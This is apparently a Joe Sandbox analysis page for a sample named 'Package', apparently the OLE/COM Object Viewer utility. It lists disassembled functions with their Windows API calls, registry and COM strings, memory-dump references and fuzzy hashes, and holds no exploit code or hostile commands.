Instruction Fuzzy Hash: 6F515035A5261CAECB25EB90CC96BEE7734AF25341F4041E8B24A660D2DFB05F94CE52

Function 001FB4F0 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 001FB4F7

Part of subcall function 001FB463: GetModuleHandleW.KERNEL32(Kernel32.dll), ref: 001FB468
Part of subcall function 001FB463: GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 001FB479

GetVersionExW.KERNEL32(002137B0,00000004), ref: 001FB512

Part of subcall function 0020BD2A: LoadLibraryW.KERNELBASE(ACLUI.DLL,001FB51D), ref: 0020BD38
Part of subcall function 0020BD2A: MessageBoxW.USER32(00000000,Couldn't get address of EditSecurity ACLUI.DLL!,OLEViewer,00000000), ref: 0020BD50
Part of subcall function 0020BD2A: exit.MSVCRT ref: 0020BD58
Part of subcall function 0020BD2A: GetProcAddress.KERNEL32(00000000,EditSecurity), ref: 0020BD64

#1202.MFC42U ref: 001FB51D
#538.MFC42U(OleInitialize failed. Could not initialized OLE; OLEViewer cannot run.), ref: 001FB530

Part of subcall function 0020D91D: __EH_prolog3.LIBCMT ref: 0020D924
Part of subcall function 0020D91D: FormatMessageW.KERNEL32(00001100,00000000,?,00000409,?,00000000,00000000,00000010,0020B9B7,?,00000000,00000000,00000000), ref: 0020D942
Part of subcall function 0020D91D: #540.MFC42U ref: 0020D94F
Part of subcall function 0020D91D: #2810.MFC42U(?,%s %s,?,00000000,?), ref: 0020D96C
Part of subcall function 0020D91D: #922.MFC42U(?,?,?,?,?,?,?), ref: 0020D97F
Part of subcall function 0020D91D: #858.MFC42U(00000000,?,?,?,?,?,?,?), ref: 0020D98C
Part of subcall function 0020D91D: #800.MFC42U(00000000,?,?,?,?,?,?,?), ref: 0020D997
Part of subcall function 0020D91D: LocalFree.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 0020D99F
Part of subcall function 0020D91D: #1197.MFC42U(?,00000000,00000000,?,?,?,?), ref: 0020D9AA
Part of subcall function 0020D91D: #800.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0020DA13

#800.MFC42U(?,00000000,OleInitialize failed. Could not initialized OLE; OLEViewer cannot run.), ref: 001FB546
#6112.MFC42U(00000011), ref: 001FB556
#2613.MFC42U(00000000,00000011), ref: 001FB571
#384.MFC42U(00000000,00000011), ref: 001FB590
#2089.MFC42U(000000C8,00000010,00000064,0000FF00,00000000,00000011), ref: 001FB5B2
#1197.MFC42U(Could not load bitmaps,00000000,00000000,000000C8,00000010,00000064,0000FF00,00000000,00000011), ref: 001FB5C2
#520.MFC42U(00000002,001F3458,001F40EC,001F4A54,000000C8,00000010,00000064,0000FF00,00000000,00000011), ref: 001FB5EE
#986.MFC42U(00000000,000000C8,00000010,00000064,0000FF00,00000000,00000011), ref: 001FB5FE
#4604.MFC42U(00000000,000000C8,00000010,00000064,0000FF00,00000000,00000011), ref: 001FB60B
#1197.MFC42U(Warning! Certain features of this program may be unavailable to you because you are not logged in as an administrator.,00000000,00000000,00000000,00000000,00000000,000000C8,00000010,00000064,0000FF00,00000000,00000011), ref: 001FB640
#5977.MFC42U ref: 001FB688

Strings

OleInitialize failed. Could not initialized OLE; OLEViewer cannot run., xrefs: 001FB528
Could not load bitmaps, xrefs: 001FB5BD
Warning! Certain features of this program may be unavailable to you because you are not logged in as an administrator., xrefs: 001FB63B

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #1197#800$AddressH_prolog3MessageProc$#1202#2089#2613#2810#384#4604#520#538#540#5977#6112#858#922#986FormatFreeHandleLibraryLoadLocalModuleVersionexit
String ID: Could not load bitmaps$OleInitialize failed. Could not initialized OLE; OLEViewer cannot run.$Warning! Certain features of this program may be unavailable to you because you are not logged in as an administrator.
API String ID: 800470354-1540245615
Opcode ID: 2997cf2a8b9d91c29baf9214156ae01d6b5926afc97114133594363743adb596
Instruction ID: 83e2eec056b35ce35986726470b06e1f5278d24a0bc77819244215f785594cf0
Opcode Fuzzy Hash: 2997cf2a8b9d91c29baf9214156ae01d6b5926afc97114133594363743adb596
Instruction Fuzzy Hash: 7441F970B15309E7DF14BBB4DC9AABE62A6AF54310F114829F612EB2D3DFB48D508B50

Function 0020642D Relevance: 30.0, APIs: 11, Strings: 6, Instructions: 284
registrycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(001F36E4,00000000,00000001,001F36F4,00000000), ref: 002064C3
GetUserDefaultLCID.KERNEL32(00000000), ref: 002064EA
StringFromGUID2.OLE32(?,?,00000050), ref: 00206589
wsprintfW.USER32 ref: 002065C8
RegOpenKeyW.ADVAPI32(80000000,Component Categories,00000000), ref: 00206750
RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000050), ref: 00206789
RegOpenKeyW.ADVAPI32(00000000,?,?), ref: 002067AB
RegQueryValueExW.ADVAPI32(?,409,00000000,00000000,?,00000200), ref: 002067E0
wsprintfW.USER32 ref: 00206813
RegCloseKey.ADVAPI32(?), ref: 0020690C

Strings

P; , xrefs: 00206467
%s <no name>, xrefs: 00206807
g, xrefs: 00206484
_%S <no name>, xrefs: 002065BC
409, xrefs: 002067D5
Component Categories, xrefs: 00206746

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: Openwsprintf$CloseCreateDefaultEnumFromInstanceQueryStringUserValue
String ID: %s <no name>$409$Component Categories$P; $_%S <no name>$g
API String ID: 3086071695-4106189502
Opcode ID: 3d10f9b5a41f8811753fd396b6a307efce21380c79667513a378b075def0b88e
Instruction ID: 0e20c746c237c63f4836baac1ad1c133d247e846371fae7ce5952c8978e55e84
Opcode Fuzzy Hash: 3d10f9b5a41f8811753fd396b6a307efce21380c79667513a378b075def0b88e
Instruction Fuzzy Hash: 21E10B71A10229DFDB60DF64DC49BA9B7BABB98315F0041E5E40DE7291DB729EA0CF10

Function 001FDBA0 Relevance: 114.2, APIs: 50, Strings: 15, Instructions: 422
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#6195.MFC42U(001F21A0), ref: 001FDBDB
#1143.MFC42U(00000093,0000000E,00000093,001F21A0), ref: 001FDBE9
LoadIconW.USER32(00000000,00000093), ref: 001FDBEF
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 001FDC03
#6195.MFC42U(001F21A0), ref: 001FDC10

Part of subcall function 001FE409: SendMessageW.USER32(?,00001304,00000000,00000000), ref: 001FE41E
Part of subcall function 001FE409: SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001FE436
Part of subcall function 001FE409: SendMessageW.USER32(?,00001309,00000000,00000000), ref: 001FE451
Part of subcall function 001FE409: #6211.MFC42U(00000000), ref: 001FE45E

#1662.MFC42U ref: 001FDC2A
lstrcmpW.KERNEL32(?,Application IDs), ref: 001FDC37
#6195.MFC42U(Application IDs), ref: 001FDC4C
#6195.MFC42U(All HKEY_CLASSES_ROOT\APPID Entries,Application IDs), ref: 001FDC58
#1143.MFC42U(00000094,0000000E,00000094,All HKEY_CLASSES_ROOT\APPID Entries,Application IDs), ref: 001FDC66
LoadIconW.USER32(00000000,00000094), ref: 001FDC6C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 001FDC80
#2644.MFC42U ref: 001FE158

Strings

LocalServer, xrefs: 001FE090
DefaultIcon, xrefs: 001FDFDD
InprocServer, xrefs: 001FE0BE
InprocServer32, xrefs: 001FE0A7
Component Categories, xrefs: 001FDD3F
No CLSID available., xrefs: 001FDCCF
All HKEY_CLASSES_ROOT\Component Categories Entries, xrefs: 001FDD53
All HKEY_CLASSES_ROOT\APPID Entries, xrefs: 001FDC51
Application IDs, xrefs: 001FDC2F, 001FDC41
Type Libraries, xrefs: 001FDDF4
InprocHandler32, xrefs: 001FE0D5
LocalServer32, xrefs: 001FE079
Interfaces, xrefs: 001FDE2B
InprocHandler, xrefs: 001FE0EC
CLSID\%s, xrefs: 001FDF8D

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: MessageSend$#6195$#1143IconLoad$#1662#2644#6211lstrcmp
String ID: All HKEY_CLASSES_ROOT\APPID Entries$All HKEY_CLASSES_ROOT\Component Categories Entries$Application IDs$CLSID\%s$Component Categories$DefaultIcon$InprocHandler$InprocHandler32$InprocServer$InprocServer32$Interfaces$LocalServer$LocalServer32$No CLSID available.$Type Libraries
API String ID: 3415864282-4228781962
Opcode ID: 8701872b0bfebbcc32567b9dd16d85b0932fc979fba0d3ef75510f6ad562bf20
Instruction ID: 276ae362b7daa21865f83ef8eb31c0157ff2651888bf999fd08d49a0ece914b9
Opcode Fuzzy Hash: 8701872b0bfebbcc32567b9dd16d85b0932fc979fba0d3ef75510f6ad562bf20
Instruction Fuzzy Hash: B6E1A371640319ABDB20BB60EC4AFBA7669EF55710F0144B8FA0EAB0D3DFB099558F50

Function 001FF616 Relevance: 110.7, APIs: 42, Strings: 21, Instructions: 447
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 001FF620
#540.MFC42U(0000025C,001FDF5F), ref: 001FF637
StringFromGUID2.OLE32(?,?,00000028,0000025C,001FDF5F), ref: 001FF64D
SendMessageW.USER32(?,0000014D,000000FF,None), ref: 001FF669
#861.MFC42U(?), ref: 001FF6B5
#6195.MFC42U(?,?,?,?,?), ref: 001FF705
#3087.MFC42U(0000008B,00000001,?,?,?,?,?), ref: 001FF73F
#2634.MFC42U(0000008B,00000001,?,?,?,?,?), ref: 001FF746
#861.MFC42U(?,?,0000008B,00000001,?,?,?,?,?), ref: 001FF790
#861.MFC42U(?,?,?,?,?,?,0000008B,00000001,?,?,?,?,?), ref: 001FF7DE
#2634.MFC42U(00000000,?,?,?,?,?,?,0000008B,00000001,?,?,?,?,?), ref: 001FF7EB
#861.MFC42U(?,001F21A0,?,00000100,?,?,?,?,?), ref: 001FF837
#861.MFC42U(001F21A0,001F21A0,?,00000100,?,?,?,?,?), ref: 001FF851
#2634.MFC42U(00000000,001F21A0,001F21A0,?,00000100,?,?,?,?,?), ref: 001FF85E
lstrcmpiW.KERNEL32(?,BOTH,?,?,00000000,001F21A0,001F21A0,?,00000100,?,?,?,?,?), ref: 001FF8AA
lstrcmpiW.KERNEL32(?,FREE,?,?,00000000,001F21A0,001F21A0,?,00000100,?,?,?,?,?), ref: 001FF8C7
lstrcmpiW.KERNEL32(?,APARTMENT,?,?,00000000,001F21A0,001F21A0,?,00000100,?,?,?,?,?), ref: 001FF8E4
lstrcmpiW.KERNEL32(?,NEUTRAL,?,?,00000000,001F21A0,001F21A0,?,00000100,?,?,?,?,?), ref: 001FF901
SendMessageW.USER32(?,0000014D,000000FF,None), ref: 001FF939
#861.MFC42U(?,001F21A0,?,00000100,?,?,?,?,?), ref: 001FF9DD
#2756.MFC42U(msjava.dll,?,001F21A0,?,00000100,?,?,?,?,?), ref: 001FF9E9
#2756.MFC42U(MSJAVA.DLL,msjava.dll,?,001F21A0,?,00000100,?,?,?,?,?), ref: 001FF9FA
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 001FFA13
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 001FFA2A
#861.MFC42U(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 001FFA7D
#2634.MFC42U(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 001FFA97
lstrcmpiW.KERNEL32(?,BOTH,?,?,?,00000000), ref: 001FFAE3
lstrcmpiW.KERNEL32(?,FREE,?,?,?,00000000), ref: 001FFB00
lstrcmpiW.KERNEL32(?,APARTMENT,?,?,?,00000000), ref: 001FFB1D
lstrcmpiW.KERNEL32(?,NEUTRAL,?,?,?,00000000), ref: 001FFB3A
SendMessageW.USER32(?,0000014D,000000FF,None), ref: 001FFB72
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 001FFBBF
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 001FFBD8
#861.MFC42U(001F21A0,?,?,?,?,?,?,?,00000000), ref: 001FFBEC
#3087.MFC42U(00001FA5,001F21A0,?,?,?,?,?,?,?,00000000), ref: 001FFBF8
#2634.MFC42U(00000000,00001FA5,001F21A0,?,?,?,?,?,?,?,00000000), ref: 001FFC00
#3087.MFC42U(0000009C,00000000,00001FA5,001F21A0,?,?,?,?,?,?,?,00000000), ref: 001FFC0C
#2634.MFC42U(00000000,0000009C,00000000,00001FA5,001F21A0,?,?,?,?,?,?,?,00000000), ref: 001FFC14
#2634.MFC42U(00000001,00000000,0000009C,00000000,00001FA5,001F21A0,?,?,?,?,?,?,?,00000000), ref: 001FFC21
#2634.MFC42U(00000001,00000001,00000000,0000009C,00000000,00001FA5,001F21A0,?,?,?,?,?,?,?,00000000), ref: 001FFC2E
#6330.MFC42U(00000000,00000001,00000001,00000000,0000009C,00000000,00001FA5,001F21A0,?,?,?,?,?,?,?,00000000), ref: 001FFC45
#800.MFC42U(00000000,00000001,00000001,00000000,0000009C,00000000,00001FA5,001F21A0,?,?,?,?,?,?,?,00000000), ref: 001FFC50

Strings

InProcServer32, xrefs: 001FF9AF, 001FFA59, 001FFAB9
Free, xrefs: 001FF8D1, 001FFB0A
TreatAs, xrefs: 001FF6D7
Apartment, xrefs: 001FF8EE, 001FFB27
ThreadingModel, xrefs: 001FF87B, 001FFAB4
JavaClass, xrefs: 001FFA54
BOTH, xrefs: 001FF89E, 001FFAD7
FREE, xrefs: 001FF8BB, 001FFAF4
AppID, xrefs: 001FF687
MSJAVA.DLL, xrefs: 001FF9F3
APARTMENT, xrefs: 001FF8D8, 001FFB11
Both, xrefs: 001FF8B4, 001FFAED
Neutral, xrefs: 001FF911, 001FFB4A
DllSurrogate, xrefs: 001FFB90
LocalService, xrefs: 001FF764, 001FF7B2
InProcHandler32, xrefs: 001FF810, 001FF880
ServiceParameters, xrefs: 001FF7AD
LocalServer32, xrefs: 001FF95D
msjava.dll, xrefs: 001FF9E2
NEUTRAL, xrefs: 001FF8F5, 001FFB2E
None, xrefs: 001FF657, 001FF920, 001FF927, 001FFB59, 001FFB60

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #2634#861lstrcmpi$MessageSend$#3087$#2756$#540#6195#6330#800FromH_prolog3_String
String ID: APARTMENT$Apartment$AppID$BOTH$Both$DllSurrogate$FREE$Free$InProcHandler32$InProcServer32$JavaClass$LocalServer32$LocalService$MSJAVA.DLL$NEUTRAL$Neutral$None$ServiceParameters$ThreadingModel$TreatAs$msjava.dll
API String ID: 3203418238-4284008715
Opcode ID: 6a6071b90f1d43264ce0dd38c2f49fe9ad6bc5afe36dca2390145a4a32472e33
Instruction ID: 42cbbac262523ca412265e78bb8738ef4aabd477c3b643fcc2e58940e551b94b
Opcode Fuzzy Hash: 6a6071b90f1d43264ce0dd38c2f49fe9ad6bc5afe36dca2390145a4a32472e33
Instruction Fuzzy Hash: 36F1A23165031DA6DF21EF20CD8AFFA77A8AF15700F0105A5BA19EB1D2DBF19A858E50

Function 001FBB96 Relevance: 100.0, APIs: 46, Strings: 11, Instructions: 246
registrylibrarystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 001FBBA0
#540.MFC42U(00000A30,00201EC1,00000000,?,00000001), ref: 001FBBB4
#4155.MFC42U(00000004,00000A30,00201EC1,00000000,?,00000001), ref: 001FBBC6
StringFromGUID2.OLE32(001F1980,?), ref: 001FBBEB
wsprintfW.USER32 ref: 001FBC04
RegQueryValueW.ADVAPI32(80000000,?,?,?), ref: 001FBC27
#3516.MFC42U(?,Version,00000000), ref: 001FBC42
#540.MFC42U(00000004,00000A30,00201EC1,00000000,?,00000001), ref: 001FBC56
#540.MFC42U(00000004,00000A30,00201EC1,00000000,?,00000001), ref: 001FBC64
GetModuleFileNameW.KERNEL32(00000000,?,00000208,00000004,00000A30,00201EC1,00000000,?,00000001), ref: 001FBC7A
wcsrchr.MSVCRT ref: 001FBC92
lstrcpyW.KERNEL32(-00000002,IVIEWERS.DLL), ref: 001FBCA3
#538.MFC42U(?), ref: 001FBCB6
#4155.MFC42U(00000012), ref: 001FBCD2
#4155.MFC42U(00000013,00000012), ref: 001FBCDF
#940.MFC42U(?,00000013,00000012), ref: 001FBCF1
#4155.MFC42U(00000015,?,00000013,00000012), ref: 001FBCFE
#940.MFC42U(?,00000015,?,00000013,00000012), ref: 001FBD10
#1197.MFC42U(?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 001FBD1F
#355.MFC42U(00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 001FBD4B
#2507.MFC42U(00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 001FBD5A
#3494.MFC42U(?,00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 001FBD74
#858.MFC42U(00000000,?,00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 001FBD84
#800.MFC42U(00000000,?,00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 001FBD8F
#800.MFC42U(00000000,?,00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 001FBD9E
#641.MFC42U(00000000,?,00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 001FBDA9
LoadLibraryW.KERNELBASE(?,?), ref: 001FBDB4
GetProcAddress.KERNEL32(00000000,DllRegisterServer), ref: 001FBDCB
#800.MFC42U(00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 001FBDF3
#641.MFC42U(00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 001FBDFE
#4155.MFC42U(00000014), ref: 001FBE11
#4155.MFC42U(00000013,00000014), ref: 001FBE1E
#940.MFC42U(?,00000013,00000014), ref: 001FBE30
#1197.MFC42U(?,00000000,00000000,?,00000013,00000014), ref: 001FBE3F
FreeLibrary.KERNEL32(00000000,?,00000000,00000000,?,00000013,00000014), ref: 001FBE4B
RegOpenKeyExW.ADVAPI32(80000000,Interface,00000000,000F003F,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 001FBE69
StringFromGUID2.OLE32(001F9E6C,?,00000031), ref: 001FBE84
StringFromGUID2.OLE32(001F9E7C,?,00000031,?,?,00000000,IClientSecurity), ref: 001FBEAA
StringFromGUID2.OLE32(001F9E8C,?,00000031,?,?,00000000,IServerSecurity), ref: 001FBED0
StringFromGUID2.OLE32(001F9E5C,?,00000031,?,?,00000000,IMallocSpy), ref: 001FBEF6
RegCloseKey.ADVAPI32(?,?,?,00000000,IMultiQI), ref: 001FBF18
#6398.MFC42U(?,Version,0000003D), ref: 001FBF34
#800.MFC42U(?,Version,0000003D), ref: 001FBF3F
#800.MFC42U(?,Version,0000003D), ref: 001FBF4A
#800.MFC42U(?,Version,0000003D), ref: 001FBF55
#800.MFC42U(?,Version,0000003D), ref: 001FBF62

Strings

Version, xrefs: 001FBC32, 001FBF24
IVIEWERS.DLL, xrefs: 001FBC9A
Interface, xrefs: 001FBE5F
iviewers.dll, xrefs: 001FBD45
DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|, xrefs: 001FBD39
IClientSecurity, xrefs: 001FBE8A
Component Categories\%s, xrefs: 001FBBFE
IMultiQI, xrefs: 001FBEFC
IMallocSpy, xrefs: 001FBED6
DllRegisterServer, xrefs: 001FBDC5
IServerSecurity, xrefs: 001FBEB0

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #800$#4155$FromString$#540#940$#1197#641Library$#2507#3494#3516#355#538#6398#858AddressCloseFileFreeH_prolog3_LoadModuleNameOpenProcQueryValuelstrcpywcsrchrwsprintf
String ID: Component Categories\%s$DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|$DllRegisterServer$IClientSecurity$IMallocSpy$IMultiQI$IServerSecurity$IVIEWERS.DLL$Interface$Version$iviewers.dll
API String ID: 2887186624-2619698232
Opcode ID: 84240c67f340297221796f8c2172241c8ae048052cd0ff8cc3e6b7573d9d784f
Instruction ID: 6f18568877ad4a5618e939d9e2edb389237fd7de6756f88ee152acda6c977234
Opcode Fuzzy Hash: 84240c67f340297221796f8c2172241c8ae048052cd0ff8cc3e6b7573d9d784f
Instruction Fuzzy Hash: F7A15136A5131CAADB20EBA0DC95FED7778AB29700F1040A5F60AB60D2DB705F95CF12

Function 00207A11 Relevance: 94.8, APIs: 33, Strings: 21, Instructions: 294
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CLSIDFromString.OLE32(00000000,?), ref: 00207A54

Strings

%s\NotInsertable, xrefs: 00207D91
2disp.dll, xrefs: 00207C22
ole, xrefs: 00207B1F, 00207BDD
ToolboxBitmap32, xrefs: 00207E8F
InprocServer, xrefs: 00207BC6
2pr32.dll, xrefs: 00207B64
2prox.dll, xrefs: 00207BF6
Control, xrefs: 00207CA0
ToolboxBitmap, xrefs: 00207EB2
cnv32.dll, xrefs: 00207B7A
InprocServer32, xrefs: 00207B04
2.dll, xrefs: 00207C0C
aut32.dll, xrefs: 00207B90
(, xrefs: 00207D53
prx32.dll, xrefs: 00207B4E
ProgID, xrefs: 00207D6E
%s\Insertable, xrefs: 00207E02
32.dll, xrefs: 00207B38
Ole1Class, xrefs: 00207C49
Insertable, xrefs: 00207CF7
CLSID\%s, xrefs: 00207A80

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: FromString
String ID: %s\Insertable$%s\NotInsertable$($2.dll$2disp.dll$2pr32.dll$2prox.dll$32.dll$CLSID\%s$Control$InprocServer$InprocServer32$Insertable$Ole1Class$ProgID$ToolboxBitmap$ToolboxBitmap32$aut32.dll$cnv32.dll$ole$prx32.dll
API String ID: 1694596556-344945948
Opcode ID: 44d582df4a3f9bf4e818836d0d80a4b6932fb8bdb2eabc5eb5dab083e1508256
Instruction ID: ac766a4d0a7106fc5db303278871248d5e8aabed86b6cc5ec90a9de7df6b045b
Opcode Fuzzy Hash: 44d582df4a3f9bf4e818836d0d80a4b6932fb8bdb2eabc5eb5dab083e1508256
Instruction Fuzzy Hash: C2D10AB195431DEFDB20EF60EC8DBD977B8BB24305F0045E5E519A21A2DB70AE948F10

Function 0020020E Relevance: 81.2, APIs: 54, Instructions: 192
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#3087.MFC42U(000000B2,00000000,?,00000000,?,001FFC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,001F21A0), ref: 0020024A
#6211.MFC42U(000000B2,00000000,?,00000000,?,001FFC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,001F21A0), ref: 00200251
#3087.MFC42U(00000089,00000000,000000B2,00000000,?,00000000,?,001FFC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,001F21A0), ref: 0020025E
#6211.MFC42U(00000089,00000000,000000B2,00000000,?,00000000,?,001FFC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,001F21A0), ref: 00200265
#3087.MFC42U(000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,001FFC41,00000001,00000001,00000000,0000009C,00000000,00001FA5), ref: 00200272
#6211.MFC42U(000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,001FFC41,00000001,00000001,00000000,0000009C,00000000,00001FA5), ref: 00200279
#3087.MFC42U(0000008B,00000005,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,001FFC41,00000001,00000001,00000000,0000009C), ref: 00200289
#6211.MFC42U(0000008B,00000005,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,001FFC41,00000001,00000001,00000000,0000009C), ref: 00200290
#3087.MFC42U(000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,001FFC41,00000001,00000001), ref: 0020029D
#6211.MFC42U(000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,001FFC41,00000001,00000001), ref: 002002A4
#3087.MFC42U(000000B1,00000000,000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,001FFC41), ref: 002002B1
#6211.MFC42U(000000B1,00000000,000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,001FFC41), ref: 002002B8
#3087.MFC42U(000000B5,00000000,000000B1,00000000,000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000), ref: 002002C5
#6211.MFC42U(000000B5,00000000,000000B1,00000000,000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000), ref: 002002CC
#3087.MFC42U(00001FA5,00000000,000000B5,00000000,000000B1,00000000,000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000), ref: 002002D9
#6211.MFC42U(00001FA5,00000000,000000B5,00000000,000000B1,00000000,000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000), ref: 002002E0
#3087.MFC42U(000000B2,00000000,?,00000000,?,001FFC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,001F21A0), ref: 002002F1
#6211.MFC42U(000000B2,00000000,?,00000000,?,001FFC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,001F21A0), ref: 002002F8
#3087.MFC42U(00000089,00000005,000000B2,00000000,?,00000000,?,001FFC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,001F21A0), ref: 00200308
#6211.MFC42U(00000089,00000005,000000B2,00000000,?,00000000,?,001FFC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,001F21A0), ref: 0020030F
#3087.MFC42U(000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,001FFC41,00000001,00000001,00000000,0000009C,00000000,00001FA5), ref: 0020031C
